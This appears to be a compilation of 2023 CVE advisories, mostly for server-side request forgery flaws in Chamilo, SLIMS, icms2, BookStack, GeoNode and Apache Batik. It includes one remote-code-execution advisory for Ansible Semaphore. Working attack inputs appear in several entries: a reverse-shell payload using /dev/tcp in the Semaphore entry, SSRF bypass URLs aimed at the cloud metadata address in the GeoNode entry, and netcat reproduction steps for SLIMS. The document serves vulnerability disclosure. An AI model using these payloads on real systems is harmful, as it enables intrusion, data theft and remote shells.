SQL Injection vulnerability in Chamilo LMS v.1.11 thru v.1.11.20 allows a remote privileged attacker to obtain sensitive information via the import sessions functions.

CVE-2023-39582: Security issues - Chamilo LMS

Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to Server Side Request Forgery (SSRF) via admin/modules/bibliography/pop_p2p.php.

**The bug**

A Server Side Request Forgery exists in admin/modules/bibliography/pop_p2p.php at the code below

$detail\_uri = $\_GET\['uri'\] . "/index.php?p=show\_detail&inXML=true&id=" . $\_GET\['biblioID'\];
// parse XML
$data = modsXMLsenayan($detail\_uri, 'uri');

**To Reproduce**

**Steps to reproduce the behavior:**

1.  Login as admin or user that has access to bibliography
2.  set up netcat to listen to a specific port (example: 7878)
3.  go to the /admin/modules/bibliography/pop_p2p.php?uri=http://LOCALHOST_OR_LISTENER_IP:7878
4.  the netcat should receive a request

**Screenshots****proof-of-concept using pipedream****proof-of-concept using netcat****versions**

*   Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86\_64)  
    Slims Version: slims9\_bulian-9.6.1

CVE-2023-40969: [Security Bugs]  Server Side Request Forgery at pop_p2p.php · Issue #204 · slims/slims9_bulian

Server-Side Request Forgery (SSRF) in GitHub repository instantsoft/icms2 prior to 2.16.1.

Expand Up @@ -315,6 +315,11 @@ function file\_get\_contents\_from\_url($url, $timeout = 5, $json\_decode = false, $p return null; }  
// По IP адресу не разрешаем if (preg\_match('#^(?:(?:https?):\\/\\/)(\[0-9\]{1,3}\\.\[0-9\]{1,3}\\.\[0-9\]{1,3}\\.\[0-9\]{1,3}).\*#ui', $url)) { return null; }  
$curl = curl\_init();  
if (strpos($url, 'https') === 0) { Expand Down Expand Up @@ -342,6 +347,7 @@ function file\_get\_contents\_from\_url($url, $timeout = 5, $json\_decode = false, $p $headers\[\] = $key . ': ' . $value; } } curl\_setopt($curl, CURLOPT\_PROTOCOLS, CURLPROTO\_HTTPS | CURLPROTO\_HTTP); curl\_setopt($curl, CURLOPT\_HTTPHEADER, $headers); curl\_setopt($curl, CURLOPT\_URL, $url); curl\_setopt($curl, CURLOPT\_CONNECTTIMEOUT, $timeout); Expand All @@ -368,17 +374,20 @@ function file\_get\_contents\_from\_url($url, $timeout = 5, $json\_decode = false, $p \* @param string $destination Полный путь куда сохраненить файл \* @return boolean \*/ function file\_save\_from\_url($url, $destination){ function file\_save\_from\_url($url, $destination) {  
if (!function\_exists('curl\_init')){ return false; } if (!function\_exists('curl\_init')) { return false; }  
$dest\_file = @fopen($destination, "w");  
$curl = curl\_init(); if(strpos($url, 'https') === 0){ if (strpos($url, 'https') === 0) { curl\_setopt($curl, CURLOPT\_SSL\_VERIFYHOST, 0); curl\_setopt($curl, CURLOPT\_SSL\_VERIFYPEER, false); } curl\_setopt($curl, CURLOPT\_PROTOCOLS, CURLPROTO\_HTTPS | CURLPROTO\_HTTP); curl\_setopt($curl, CURLOPT\_URL, $url); curl\_setopt($curl, CURLOPT\_RETURNTRANSFER, true); curl\_setopt($curl, CURLOPT\_FILE, $dest\_file); Expand All @@ -388,8 +397,8 @@ function file\_save\_from\_url($url, $destination){ fclose($dest\_file);  
return true;  
}  
/\*\* \* Накладывает ваттермарк на изображение \* Expand Down

CVE-2023-4651: Fix SSRF Blind in the image upload · instantsoft/icms2@a6bf758

Server-Side Request Forgery (SSRF) in GitHub repository bookstackapp/bookstack prior to v23.08.

@@ -0,0 +1,59 @@ <?php  
namespace Tests\\Unit;  
use BookStack\\Exceptions\\HttpFetchException; use BookStack\\Util\\SsrUrlValidator; use Tests\\TestCase;  
class SsrUrlValidatorTest extends TestCase { public function test\_allowed() { $testMap = \[ // Single values \['config' => '', 'url' => '', 'result' => false\], \['config' => '', 'url' => 'https://example.com', 'result' => false\], \['config' => ' ', 'url' => 'https://example.com', 'result' => false\], \['config' => '\*', 'url' => '', 'result' => false\], \['config' => '\*', 'url' => 'https://example.com', 'result' => true\], \['config' => 'https://\*', 'url' => 'https://example.com', 'result' => true\], \['config' => 'http://\*', 'url' => 'https://example.com', 'result' => false\], \['config' => 'https://\*example.com', 'url' => 'https://example.com', 'result' => true\], \['config' => 'https://\*ample.com', 'url' => 'https://example.com', 'result' => true\], \['config' => 'https://\*.example.com', 'url' => 'https://example.com', 'result' => false\], \['config' => 'https://\*.example.com', 'url' => 'https://test.example.com', 'result' => true\], \['config' => '\*//example.com', 'url' => 'https://example.com', 'result' => true\], \['config' => '\*//example.com', 'url' => 'http://example.com', 'result' => true\], \['config' => 'https://example.com', 'url' => 'https://example.com/a/b/c?test=cat', 'result' => true\], \['config' => 'https://example.com', 'url' => 'https://example.co.uk', 'result' => false\],  
// Escapes \['config' => 'https://(.\*?).com', 'url' => 'https://example.com', 'result' => false\], \['config' => 'https://example.com', 'url' => 'https://example.co.uk#https://example.com', 'result' => false\],  
// Multi values \['config' => '\*//example.org \*//example.com', 'url' => 'https://example.com', 'result' => true\], \['config' => '\*//example.org \*//example.com', 'url' => 'https://example.com/a/b/c?test=cat#hello', 'result' => true\], \['config' => '\*.example.org \*.example.com', 'url' => 'https://example.co.uk', 'result' => false\], \['config' => ' \*.example.org \*.example.com ', 'url' => 'https://example.co.uk', 'result' => false\], \['config' => '\* \*.example.com', 'url' => 'https://example.co.uk', 'result' => true\], \['config' => '\*//example.org \*//example.com \*//example.co.uk', 'url' => 'https://example.co.uk', 'result' => true\], \['config' => '\*//example.org \*//example.com \*//example.co.uk', 'url' => 'https://example.net', 'result' => false\], \];  
foreach ($testMap as $test) { $result = (new SsrUrlValidator($test\['config'\]))->allowed($test\['url'\]); $this\->assertEquals($test\['result'\], $result, "Failed asserting url '{$test\['url'\]}' with config '{$test\['config'\]}' results " . ($test\['result'\] ? 'true' : 'false')); } }  
public function test\_enssure\_allowed() { $result = (new SsrUrlValidator('https://example.com'))->ensureAllowed('https://example.com'); $this\->assertNull($result);  
$this\->expectException(HttpFetchException::class); (new SsrUrlValidator('https://example.com'))->ensureAllowed('https://test.example.com'); } }

CVE-2023-4624: Security: Added new SSR allow list and validator · BookStackApp/BookStack@c324ad9

An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.

\---------------------------------------------------------------

\[VulnerabilityType Other\]

Remote Command Execution (RCE)

\---------------------------------------------------------------

\[Affected Component\]

Ansible Semaphore includes a feature called "Extra Variables." This feature can be accessed at https://<semaphore-endpoint>/project/id/environment and is directly associated with the ansible-playbook --extra-vars flag.

\---------------------------------------------------------------

\[Attack Type\]

Remote

\---------------------------------------------------------------

\[Impact Code execution\]

true

\---------------------------------------------------------------

\[Impact Denial of Service\]

true

\---------------------------------------------------------------

\[Impact Escalation of Privileges\]

true

\---------------------------------------------------------------

\[Impact Information Disclosure\]

true

\---------------------------------------------------------------

\[Attack Vectors\]

The --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server. Payload:

{"ansible\_user": "{{ lookup('ansible.builtin.pipe', \\"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\\") }}"}

\---------------------------------------------------------------

\[Has vendor confirmed\]

true

\---------------------------------------------------------------

\[Discoverer\]

@alevsk

\---------------------------------------------------------------

\[Reference\]

https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/

\---------------------------------------------------------------

\[Vendor of Product\]

ansible semaphore

\---------------------------------------------------------------

\[Affected Product Code Base\]

ansible semaphore v2.8.90

\---------------------------------------------------------------

CVE-2023-39059: CVE-2023-39059

GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. In versions 3.2.0 through 4.1.2, the endpoint `/proxy/?url=` does not properly protect against server-side request forgery. This allows an attacker to port scan internal hosts and request information from internal hosts. A patch is available at commit a9eebae80cb362009660a1fd49e105e7cdb499b9.

**Summary**

Hello, I have found a server side request forgery vuln within geonode when testing on a bug bounty program. Server side request forgery allows a user to request information on the internal service/services.

**Details**

The endpoint /proxy/?url= does not properly protect against SSRF. when using the following format you can request internal hosts and display data. /proxy/?url=http://169.254.169.254\\@whitelistedIPhere. This will state wether the AWS internal IP is alive. If you get a 404, the host is alive. A non alive host will not display a response. To display metadata, use a hashfrag on the url /proxy/?url=http://169.254.169.254\\@#whitelisteddomain.com or try /proxy/?url=http://169.254.169.254\\@%23whitelisteddomain.com

**Impact**

Port scan internal hosts, and request information from internal hosts.

CVE-2023-40017: Server Side Request forgery

Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16.

On version 1.16, a malicious SVG could trigger loading external resources by default, causing resource consumption or in some cases even information disclosure. Users are recommended to upgrade to version 1.17 or later.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-44729

**Apache XML Graphics Batik Server-Side Request Forgery vulnerability**

Moderate severity GitHub Reviewed Published Aug 22, 2023 to the GitHub Advisory Database • Updated Aug 23, 2023

**Package**

maven org.apache.xmlgraphics:batik-bridge (Maven)

**Affected versions**

\>= 1.0, < 1.17

maven org.apache.xmlgraphics:batik-svgrasterizer (Maven)

maven org.apache.xmlgraphics:batik-transcoder (Maven)

**Description**

Published to the GitHub Advisory Database

Aug 22, 2023

Last updated

Aug 23, 2023

GHSA-gq5f-xv48-2365: Apache XML Graphics Batik Server-Side Request Forgery vulnerability

Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16.

A malicious SVG can probe user profile / data and send it directly as parameter to a URL.



**Apache Batik information disclosure vulnerability**

Moderate severity GitHub Reviewed Published Aug 22, 2023 to the GitHub Advisory Database • Updated Aug 23, 2023

GHSA-2474-2566-3qxp: Apache Batik information disclosure vulnerability

**Email display mode:**

Modern rendering  
Legacy rendering

Tag

#ssrf